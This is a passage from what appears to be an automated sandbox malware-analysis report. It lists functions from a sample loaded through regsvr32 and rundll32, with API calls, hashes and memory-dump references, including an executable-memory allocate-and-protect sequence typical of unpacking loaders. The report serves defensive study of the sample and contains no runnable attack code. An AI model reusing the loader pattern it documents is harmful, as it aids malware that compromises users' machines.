					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}

0x007a4ddd
0x007a4de1
0x007a4deb
0x007a4df2
0x007a4df5
0x007a4df7
0x007a4dff
0x007a4e04
0x007a4e12
0x007a4e17
0x007a4e21

APIs

lstrlenW.KERNEL32(004F0053,73B75520,?,00000008,0529932C,?,007A4ABB,004F0053,0529932C,?,?,?,?,?,?,007A1BD5), ref: 007A4DD8
lstrlenW.KERNEL32(007A4ABB,?,007A4ABB,004F0053,0529932C,?,?,?,?,?,?,007A1BD5), ref: 007A4DDF

Part of subcall function 007A5C4E: RtlAllocateHeap.NTDLL(00000000,00000000,007A3FAA), ref: 007A5C5A

memcpy.NTDLL(00000000,004F0053,73B769A0,?,?,007A4ABB,004F0053,0529932C,?,?,?,?,?,?,007A1BD5), ref: 007A4DFF
memcpy.NTDLL(73B769A0,007A4ABB,00000002,00000000,004F0053,73B769A0,?,?,007A4ABB,004F0053,0529932C), ref: 007A4E12

Memory Dump Source

Source File: 00000002.00000002.1093375016.00000000007A1000.00000020.00000001.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000002.00000002.1093347027.00000000007A0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093436516.00000000007A9000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1093456870.00000000007AA000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093479026.00000000007AC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7a0000_regsvr32.jbxd

Similarity

API ID: lstrlenmemcpy$AllocateHeap
String ID:
API String ID: 2411391700-0
Opcode ID: 8af5dd1652b6d291578cd4c5e8748ffd42be6d34d46c7df42c57427fe4e9a8ff
Instruction ID: 939e781c7ca7247156cb6a8bbee40619ad3035882754d4692c58e5700a6cc894
Opcode Fuzzy Hash: 8af5dd1652b6d291578cd4c5e8748ffd42be6d34d46c7df42c57427fe4e9a8ff
Instruction Fuzzy Hash: A0F03C32900118BF8B11DFA8CC49C9A7BACEE493547114162BA04D7102E775EA148BA0

Uniqueness

Uniqueness Score: -1.00%

Function 007A2829, Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(0529887A,00000000,00000000,00000000,007A6328,00000000), ref: 007A2839
lstrlen.KERNEL32(?), ref: 007A2841

Part of subcall function 007A5C4E: RtlAllocateHeap.NTDLL(00000000,00000000,007A3FAA), ref: 007A5C5A

lstrcpy.KERNEL32(00000000,0529887A), ref: 007A2855
lstrcat.KERNEL32(00000000,?), ref: 007A2860

Memory Dump Source

Source File: 00000002.00000002.1093375016.00000000007A1000.00000020.00000001.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000002.00000002.1093347027.00000000007A0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093436516.00000000007A9000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1093456870.00000000007AA000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093479026.00000000007AC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7a0000_regsvr32.jbxd

Similarity

API ID: lstrlen$AllocateHeaplstrcatlstrcpy
String ID:
API String ID: 74227042-0
Opcode ID: f3b409875baa9d49a3833bbef365614df831076d83304b636531ffb3685add6d
Instruction ID: 5d8e39d04849e6184084726a90c7892993a3ad6508d135be9e28d971ae65653c
Opcode Fuzzy Hash: f3b409875baa9d49a3833bbef365614df831076d83304b636531ffb3685add6d
Instruction Fuzzy Hash: 83E09233901222A787115BA99C4CC9FBBACEFCA6A13044416FB00D3110C72C8815CBAA

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 6044 Parent PID: 7148 rundll32.exeCOMMON

Executed Functions

Function 6D50B242, Relevance: 13.8, APIs: 9, Instructions: 318
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,000009B2,00003000,00000040,000009B2,6D50AC98), ref: 6D50B2FC
VirtualAlloc.KERNEL32(00000000,000000D7,00003000,00000040,6D50ACFB), ref: 6D50B333
VirtualAlloc.KERNEL32(00000000,00014ED4,00003000,00000040), ref: 6D50B393
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6D50B3C9
VirtualProtect.KERNEL32(6D4A0000,00000000,00000004,6D50B221), ref: 6D50B4CE
VirtualProtect.KERNEL32(6D4A0000,00001000,00000004,6D50B221), ref: 6D50B4F5
VirtualProtect.KERNEL32(00000000,?,00000002,6D50B221), ref: 6D50B5C2
VirtualProtect.KERNEL32(00000000,?,00000002,6D50B221,?), ref: 6D50B618
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6D50B634

Memory Dump Source

Source File: 00000003.00000002.1098189982.000000006D50A000.00000040.00020000.sdmp, Offset: 6D50A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d50a000_rundll32.jbxd

Similarity

API ID: Virtual$Protect$Alloc$Free
String ID:
API String ID: 2574235972-0
Opcode ID: 94db6ec75e7b3355c8b79fe8e1073f7e0b9c5fcc91065ff0fda1bf8dbaf2fb05
Instruction ID: bdba57c5292f3e119830b62cd7a1019b3e19645a0c61d74e42252049a46fec1f
Opcode Fuzzy Hash: 94db6ec75e7b3355c8b79fe8e1073f7e0b9c5fcc91065ff0fda1bf8dbaf2fb05
Instruction Fuzzy Hash: 2BD148725002019FDB25EF58C8C0E6277B6FFAD314B1A4994EE2DAF75AD630A9118F60

Uniqueness

Uniqueness Score: -1.00%

Function 6D4DB9D1, Relevance: 7.6, APIs: 5, Instructions: 87
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

dllmain_raw.LIBCMT ref: 6D4DBA0E
dllmain_crt_dispatch.LIBCMT ref: 6D4DBA25
dllmain_raw.LIBCMT ref: 6D4DBA6D
dllmain_crt_dispatch.LIBCMT ref: 6D4DBA80
dllmain_raw.LIBCMT ref: 6D4DBA93

Memory Dump Source

Source File: 00000003.00000002.1097870842.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d4ae000_rundll32.jbxd

Similarity

API ID: dllmain_raw$dllmain_crt_dispatch
String ID:
API String ID: 3136044242-0
Opcode ID: 6f2f5998ca6564cf7fdaa765ff7dcbb046bd2065d2ceafd773fd41370acc6677
Instruction ID: db0f3f3ef5772fe3921961364e234be5df0354b2bc8db68b6e23fb630a31b760
Opcode Fuzzy Hash: 6f2f5998ca6564cf7fdaa765ff7dcbb046bd2065d2ceafd773fd41370acc6677
Instruction Fuzzy Hash: 59217A72D0866AAFCBA28E55CC60E7F3A79EF85A94F124159F91867310D7308D028BE0

Uniqueness

Uniqueness Score: -1.00%

Function 6D4D7CE0, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 205
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtectEx.KERNELBASE(000000FF,?,0000416C,00000040,?), ref: 6D4D7E3D

Strings

/, xrefs: 6D4D7CE7
@, xrefs: 6D4D7CF7

Memory Dump Source

Source File: 00000003.00000002.1097870842.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d4ae000_rundll32.jbxd

Similarity

API ID: ProtectVirtual
String ID: /$@
API String ID: 544645111-1264875769
Opcode ID: b4c3e638d1386b3da702d118239c8aa9e192c6ab131dfeec69b8bb4a767a6358
Instruction ID: be545fa034a88deb6dde85f956f91dd353d6ab13f640aafc6f9336b99b9925ae
Opcode Fuzzy Hash: b4c3e638d1386b3da702d118239c8aa9e192c6ab131dfeec69b8bb4a767a6358
Instruction Fuzzy Hash: 0EA18B79904154DFDF08CF69C570BA8BBB1BB86302F0EC16EE88587A99E7345A84DF50

Uniqueness

Uniqueness Score: -1.00%

Function 6D4DB81A, Relevance: 4.6, APIs: 3, Instructions: 76
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__RTC_Initialize.LIBCMT ref: 6D4DB867

Part of subcall function 6D4DC084: RtlInitializeSListHead.NTDLL(6D51A9E0), ref: 6D4DC089

___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6D4DB8D1
___scrt_fastfail.LIBCMT ref: 6D4DB91B

Memory Dump Source

Source File: 00000003.00000002.1097870842.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d4ae000_rundll32.jbxd

Similarity

API ID: Initialize$HeadList___scrt_fastfail___scrt_is_nonwritable_in_current_image
String ID:
API String ID: 2097537958-0
Opcode ID: 2a0d6fbdc72065d054ee6f895387a690ab9989899cec32a675fa35a34e260e30
Instruction ID: 75dadfaac4119e30d6773af1a4495721f51c7a59a16c647c2f7124e5e21e4ed3
Opcode Fuzzy Hash: 2a0d6fbdc72065d054ee6f895387a690ab9989899cec32a675fa35a34e260e30
Instruction Fuzzy Hash: 0B21C032649246AEEF81EFF4D831FAD77709F4636DF22405DEA9067282CB220C469695

Uniqueness

Uniqueness Score: -1.00%

Function 6D4E06D9, Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000), ref: 6D4E071A

Memory Dump Source

Source File: 00000003.00000002.1097870842.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d4ae000_rundll32.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 056c51b5185a36f06f7ca96c892a373df9f1e65d07f6b33c907681fed2780c50
Instruction ID: 93a8a99ce55b3095ce68f4d6e7e4ddc135cdbb5231a942aa6eeebea029423a22
Opcode Fuzzy Hash: 056c51b5185a36f06f7ca96c892a373df9f1e65d07f6b33c907681fed2780c50
Instruction Fuzzy Hash: 4DF0BB315495377BEF115E278C45F57375CAF817E2B258125AC34D7180DF60DC0149D1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6D4E2D42, Relevance: 19.6, APIs: 13, Instructions: 113
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

___free_lconv_mon.LIBCMT ref: 6D4E2D86

Part of subcall function 6D4E4C1D: _free.LIBCMT ref: 6D4E4C3A
Part of subcall function 6D4E4C1D: _free.LIBCMT ref: 6D4E4C4C
Part of subcall function 6D4E4C1D: _free.LIBCMT ref: 6D4E4C5E
Part of subcall function 6D4E4C1D: _free.LIBCMT ref: 6D4E4C70
Part of subcall function 6D4E4C1D: _free.LIBCMT ref: 6D4E4C82
Part of subcall function 6D4E4C1D: _free.LIBCMT ref: 6D4E4C94
Part of subcall function 6D4E4C1D: _free.LIBCMT ref: 6D4E4CA6
Part of subcall function 6D4E4C1D: _free.LIBCMT ref: 6D4E4CB8
Part of subcall function 6D4E4C1D: _free.LIBCMT ref: 6D4E4CCA
Part of subcall function 6D4E4C1D: _free.LIBCMT ref: 6D4E4CDC
Part of subcall function 6D4E4C1D: _free.LIBCMT ref: 6D4E4CEE
Part of subcall function 6D4E4C1D: _free.LIBCMT ref: 6D4E4D00
Part of subcall function 6D4E4C1D: _free.LIBCMT ref: 6D4E4D12

_free.LIBCMT ref: 6D4E2D7B

Part of subcall function 6D4E0736: HeapFree.KERNEL32(00000000,00000000,?,6D4E4DAE,?,00000000,?,6D509096,?,6D4E4DD5,?,00000007,?,?,6D4E2ED9,?), ref: 6D4E074C
Part of subcall function 6D4E0736: GetLastError.KERNEL32(?,?,6D4E4DAE,?,00000000,?,6D509096,?,6D4E4DD5,?,00000007,?,?,6D4E2ED9,?,?), ref: 6D4E075E

_free.LIBCMT ref: 6D4E2D9D
_free.LIBCMT ref: 6D4E2DB2
_free.LIBCMT ref: 6D4E2DBD
_free.LIBCMT ref: 6D4E2DDF
_free.LIBCMT ref: 6D4E2DF2
_free.LIBCMT ref: 6D4E2E00
_free.LIBCMT ref: 6D4E2E0B
_free.LIBCMT ref: 6D4E2E43
_free.LIBCMT ref: 6D4E2E4A
_free.LIBCMT ref: 6D4E2E67
_free.LIBCMT ref: 6D4E2E7F

Memory Dump Source

Source File: 00000003.00000002.1097870842.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d4ae000_rundll32.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 568347eea2d2b90a6c68f00e5c0b2d648ab6afcd9b3ae7505d8530913daeea9d
Instruction ID: 277729690970b8ab667a7af377833be38c685df301199059b0a0792b7c5bbe60
Opcode Fuzzy Hash: 568347eea2d2b90a6c68f00e5c0b2d648ab6afcd9b3ae7505d8530913daeea9d
Instruction Fuzzy Hash: 64313D31908213BFEB319A39D880F6773E5AF00396F218829E565DB290DF34EC40CA60

Uniqueness

Uniqueness Score: -1.00%

Function 6D4DD9B0, Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 308
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

IsInExceptionSpec.LIBVCRUNTIME ref: 6D4DDAAB
type_info::operator==.LIBVCRUNTIME ref: 6D4DDAD2
___TypeMatch.LIBVCRUNTIME ref: 6D4DDBDE
CatchIt.LIBVCRUNTIME ref: 6D4DDC33
IsInExceptionSpec.LIBVCRUNTIME ref: 6D4DDCB9
_UnwindNestedFrames.LIBCMT ref: 6D4DDD40
CallUnexpected.LIBVCRUNTIME ref: 6D4DDD5B

Strings

csm, xrefs: 6D4DDA58
csm, xrefs: 6D4DDB09
csm, xrefs: 6D4DD9EB

Memory Dump Source

Source File: 00000003.00000002.1097870842.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d4ae000_rundll32.jbxd

Similarity

API ID: ExceptionSpec$CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 4234981820-393685449
Opcode ID: c88dfd58291b27876d6d9f3e4a1026cdc6f2b43c06ef4391f1698c7e5a7b8aeb
Instruction ID: 176e4d4c6c2e9c8f131b534a43e6d06ade16242f21e31706bf85169b17c038fd
Opcode Fuzzy Hash: c88dfd58291b27876d6d9f3e4a1026cdc6f2b43c06ef4391f1698c7e5a7b8aeb
Instruction Fuzzy Hash: 61C1667180830A9BCF55CFA4C9A0EAEBBB4BF84718F11415AE9156B311D371EE52CF91

Uniqueness

Uniqueness Score: -1.00%

Function 6D4E0198, Relevance: 15.1, APIs: 10, Instructions: 69
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_free.LIBCMT ref: 6D4E01AE

Part of subcall function 6D4E0736: HeapFree.KERNEL32(00000000,00000000,?,6D4E4DAE,?,00000000,?,6D509096,?,6D4E4DD5,?,00000007,?,?,6D4E2ED9,?), ref: 6D4E074C
Part of subcall function 6D4E0736: GetLastError.KERNEL32(?,?,6D4E4DAE,?,00000000,?,6D509096,?,6D4E4DD5,?,00000007,?,?,6D4E2ED9,?,?), ref: 6D4E075E

_free.LIBCMT ref: 6D4E01BA
_free.LIBCMT ref: 6D4E01C5
_free.LIBCMT ref: 6D4E01D0
_free.LIBCMT ref: 6D4E01DB
_free.LIBCMT ref: 6D4E01E6
_free.LIBCMT ref: 6D4E01F1
_free.LIBCMT ref: 6D4E01FC
_free.LIBCMT ref: 6D4E0207
_free.LIBCMT ref: 6D4E0215

Memory Dump Source

Source File: 00000003.00000002.1097870842.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d4ae000_rundll32.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 98a57a5b51ee1af6fcc902e3a3fe9210ca30bb7c7e551208d2758686fa4a2458
Instruction ID: 7333431b6b7d2a748bf7151e560242e376712b2d2748dd78ed671c25f4c7171c
Opcode Fuzzy Hash: 98a57a5b51ee1af6fcc902e3a3fe9210ca30bb7c7e551208d2758686fa4a2458
Instruction Fuzzy Hash: 9321FF7A908119BFDF11DFA5C980DEE7BB8BF08285F41816AF6159B120EB35DA45CF80

Uniqueness

Uniqueness Score: -1.00%

Function 6D4E4DBC, Relevance: 10.6, APIs: 7, Instructions: 65
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 6D4E4D84: _free.LIBCMT ref: 6D4E4DA9

_free.LIBCMT ref: 6D4E4E0A

Part of subcall function 6D4E0736: HeapFree.KERNEL32(00000000,00000000,?,6D4E4DAE,?,00000000,?,6D509096,?,6D4E4DD5,?,00000007,?,?,6D4E2ED9,?), ref: 6D4E074C
Part of subcall function 6D4E0736: GetLastError.KERNEL32(?,?,6D4E4DAE,?,00000000,?,6D509096,?,6D4E4DD5,?,00000007,?,?,6D4E2ED9,?,?), ref: 6D4E075E

_free.LIBCMT ref: 6D4E4E15
_free.LIBCMT ref: 6D4E4E20
_free.LIBCMT ref: 6D4E4E74
_free.LIBCMT ref: 6D4E4E7F
_free.LIBCMT ref: 6D4E4E8A
_free.LIBCMT ref: 6D4E4E95

Memory Dump Source

Source File: 00000003.00000002.1097870842.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d4ae000_rundll32.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 42c5e9fb9c8a107f3b8bf8ffb1c0d6ba7119298d49e70c01c512aecdb6b53527
Instruction ID: 2377be2a2ea238cda24e10525a1db54bc8df28070bb57ab9367c4e1821790458
Opcode Fuzzy Hash: 42c5e9fb9c8a107f3b8bf8ffb1c0d6ba7119298d49e70c01c512aecdb6b53527
Instruction Fuzzy Hash: 6A118431948B54B6D931EBB2CC45FEB77AC5F0C7D9F41482CA3AD66050EB24FD048A90

Uniqueness

Uniqueness Score: -1.00%

Function 6D4E3ECF, Relevance: 9.3, APIs: 6, Instructions: 318
fileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetConsoleCP.KERNEL32(?,00000001,00000000), ref: 6D4E3F17
__fassign.LIBCMT ref: 6D4E40F6
__fassign.LIBCMT ref: 6D4E4113
WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6D4E415B
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6D4E419B
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6D4E4247

Memory Dump Source

Source File: 00000003.00000002.1097870842.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d4ae000_rundll32.jbxd

Similarity

API ID: FileWrite__fassign$ConsoleErrorLast
String ID:
API String ID: 4031098158-0
Opcode ID: a3722549f88305eaf50b6f9706584ce869abe3ba1b1fea4387abcdaf5d67026c
Instruction ID: c234f81b7afb385bdaf08188c61ce5f90c5fdf1f9abd39a9240603d34b4acaaa
Opcode Fuzzy Hash: a3722549f88305eaf50b6f9706584ce869abe3ba1b1fea4387abcdaf5d67026c
Instruction Fuzzy Hash: 74D18B71D04259AFCF15CFE8C880AEDBBB5BF49395F284169E869BB241D730AD06CB50

Uniqueness

Uniqueness Score: -1.00%

Function 6D4DD679, Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,6D4DD288,6D4DB4EA,6D4DB7F2), ref: 6D4DD687
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6D4DD695
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6D4DD6AE
SetLastError.KERNEL32(00000000,?,6D4DD288,6D4DB4EA,6D4DB7F2), ref: 6D4DD700

Memory Dump Source

Source File: 00000003.00000002.1097870842.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d4ae000_rundll32.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 1cfb65accd97bfd254efd22606ae9ef946a57f7f1d061dffd374167ea91001fe
Instruction ID: 27faa6a5570bec9d8a88c1e4bfd2dae2f696f17ed23cde4d4ae8b3e8c3ba3f41
Opcode Fuzzy Hash: 1cfb65accd97bfd254efd22606ae9ef946a57f7f1d061dffd374167ea91001fe
Instruction Fuzzy Hash: 6101F13220E7136EEA8416789CB0F262674EB83679736423EF638862D4EF528C01C9D0

Uniqueness

Uniqueness Score: -1.00%

Function 6D4E0FA2, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83COMMON

Download Yara Rule

Strings

C:\Windows\SysWOW64\rundll32.exe, xrefs: 6D4E0FA7

Memory Dump Source

Source File: 00000003.00000002.1097870842.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d4ae000_rundll32.jbxd

Similarity

API ID:
String ID: C:\Windows\SysWOW64\rundll32.exe
API String ID: 0-2837366778
Opcode ID: 8485b27fb4ba88a4c63cc48041d18d01d3502fb80163be4382c22dea556ffcc7
Instruction ID: fe9a874c504df374da96fcf93b0bc4fdc5246f18f872de6ea42a0c212c17a954
Opcode Fuzzy Hash: 8485b27fb4ba88a4c63cc48041d18d01d3502fb80163be4382c22dea556ffcc7
Instruction Fuzzy Hash: 3C21A4716482067FDB20DF768C80E6BB7ADEF413EA7114919F624E7A50EB30DD5087A1

Uniqueness

Uniqueness Score: -1.00%

Function 6D4E4D1B, Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 6D4E4D33

Part of subcall function 6D4E0736: HeapFree.KERNEL32(00000000,00000000,?,6D4E4DAE,?,00000000,?,6D509096,?,6D4E4DD5,?,00000007,?,?,6D4E2ED9,?), ref: 6D4E074C
Part of subcall function 6D4E0736: GetLastError.KERNEL32(?,?,6D4E4DAE,?,00000000,?,6D509096,?,6D4E4DD5,?,00000007,?,?,6D4E2ED9,?,?), ref: 6D4E075E

_free.LIBCMT ref: 6D4E4D45
_free.LIBCMT ref: 6D4E4D57
_free.LIBCMT ref: 6D4E4D69
_free.LIBCMT ref: 6D4E4D7B

Memory Dump Source

Source File: 00000003.00000002.1097870842.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d4ae000_rundll32.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: fe5e775f17b681ccb50e5caf04730a911bdbac6678a20df1f3acec7a6b436baf
Instruction ID: 87609a9906461c223975c617c3859956e864a5d95ac905274ff42403ebee3eca
Opcode Fuzzy Hash: fe5e775f17b681ccb50e5caf04730a911bdbac6678a20df1f3acec7a6b436baf
Instruction Fuzzy Hash: 9CF03C32408255BBDE20DE65D0C0D7B73E9AA4A3D2366880DE168DBB00CF24FC808EA0

Uniqueness

Uniqueness Score: -1.00%

Function 6D4E0926, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 206COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6D4E0AC0

Strings

*?, xrefs: 6D4E0969

Memory Dump Source

Source File: 00000003.00000002.1097870842.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d4ae000_rundll32.jbxd

Similarity

API ID: _free
String ID: *?
API String ID: 269201875-2564092906
Opcode ID: cae5a1d20d404d27c97126f5a7490949682a01efc8be1cbb21b7cc0484ab180d
Instruction ID: 84d1a3c2f1e42a49b9fbb3f91081446061c26815b60ba2295d3cd1d7bed5a214
Opcode Fuzzy Hash: cae5a1d20d404d27c97126f5a7490949682a01efc8be1cbb21b7cc0484ab180d
Instruction Fuzzy Hash: 91614075D0421AAFDB15CFAAC8809EEFBF5FF48354B258169D864E7300DB359E418B90

Uniqueness

Uniqueness Score: -1.00%

Function 6D4E473A, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 177fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 6D4E3ECF: GetConsoleCP.KERNEL32(?,00000001,00000000), ref: 6D4E3F17

WriteFile.KERNEL32(?,00000000,6D4E27CC,?,00000000,?,?,?,6D4E275B,?,?,?,6D508130,0000002C,6D4E27CC,?), ref: 6D4E488B
GetLastError.KERNEL32 ref: 6D4E4895
__dosmaperr.LIBCMT ref: 6D4E48DA

Strings

['Nm, xrefs: 6D4E4875, 6D4E4864, 6D4E4854, 6D4E4844, 6D4E4808, 6D4E47EE, 6D4E47F2, 6D4E480D, 6D4E4849, 6D4E4859, 6D4E4869

Memory Dump Source

Source File: 00000003.00000002.1097870842.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d4ae000_rundll32.jbxd

Similarity

API ID: ConsoleErrorFileLastWrite__dosmaperr
String ID: ['Nm
API String ID: 251514795-1572042932
Opcode ID: e2f413d9e491aa20e69625354c97f892c8c484af896b8404ac79454e40825215
Instruction ID: be01dc899dbaa7fcbc4affa0171e3af640204efa60aa4bc1744593fa648cb33f
Opcode Fuzzy Hash: e2f413d9e491aa20e69625354c97f892c8c484af896b8404ac79454e40825215
Instruction Fuzzy Hash: 5351E075A0421ABBEF01CBA8C880FEE7BB8BF4E3DAF120555E514A7251D770DD018BA0

Uniqueness

Uniqueness Score: -1.00%

Function 6D4DDD66, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(00000000), ref: 6D4DDD8B
CatchIt.LIBVCRUNTIME ref: 6D4DDE71

Strings

RCC, xrefs: 6D4DDDA5
MOC, xrefs: 6D4DDD9D

Memory Dump Source

Source File: 00000003.00000002.1097870842.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d4ae000_rundll32.jbxd

Similarity

API ID: CatchEncodePointer
String ID: MOC$RCC
API String ID: 1435073870-2084237596
Opcode ID: cc8c67824a3ac36572c0d73191a3809fd92ff93fca4bcca1bd84a215e910309d
Instruction ID: f0e64566a6de7176826e379737fd5114846be050f947485f646a0af8f6c3028b
Opcode Fuzzy Hash: cc8c67824a3ac36572c0d73191a3809fd92ff93fca4bcca1bd84a215e910309d
Instruction Fuzzy Hash: 5041587190060AAFCF41CF94CC90EEE7BB5BF88304F258099EA19A7221D335AD50DF90

Uniqueness

Uniqueness Score: -1.00%

Function 6D4DD759, Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 6D4DD820
___AdjustPointer.LIBCMT ref: 6D4DD843
___AdjustPointer.LIBCMT ref: 6D4DD8DF

Memory Dump Source

Source File: 00000003.00000002.1097870842.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d4ae000_rundll32.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: af0339a9fd17988ac0b7f9a09f828bfb4dbeb6087244d90e1d271c16d1c821e3
Instruction ID: 73e83428b56918b278c83cafe28ad0634f5bd3342b488396aba04ea090308d2e
Opcode Fuzzy Hash: af0339a9fd17988ac0b7f9a09f828bfb4dbeb6087244d90e1d271c16d1c821e3
Instruction Fuzzy Hash: 1D51DF72909706AFEB568F14C8A0F7A77A4BF85714F24452DE9A197290D731EC41CF90

Uniqueness

Uniqueness Score: -1.00%

Function 6D4E083A, Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 6D4E0E5C: _free.LIBCMT ref: 6D4E0E6A

Part of subcall function 6D4E1A36: WideCharToMultiByte.KERNEL32(?,00000000,6D4E27CC,00000000,00000001,?,_HNm,?,6D4E27CC,?,00000000,?,6D4E45CE,0000FDE9,00000000,?), ref: 6D4E1AD8

GetLastError.KERNEL32 ref: 6D4E08A2
__dosmaperr.LIBCMT ref: 6D4E08A9
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 6D4E08E8
__dosmaperr.LIBCMT ref: 6D4E08EF

Memory Dump Source

Source File: 00000003.00000002.1097870842.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d4ae000_rundll32.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
String ID:
API String ID: 167067550-0
Opcode ID: 1ac6c75cdf9def5779a8757a8501bbff243ebd136c1c43d40018c1bf8ba80cc5
Instruction ID: 21d260819395979812b9bbd63eb2df4e672626c9cd9e2db87c693ccd0176e6a5
Opcode Fuzzy Hash: 1ac6c75cdf9def5779a8757a8501bbff243ebd136c1c43d40018c1bf8ba80cc5
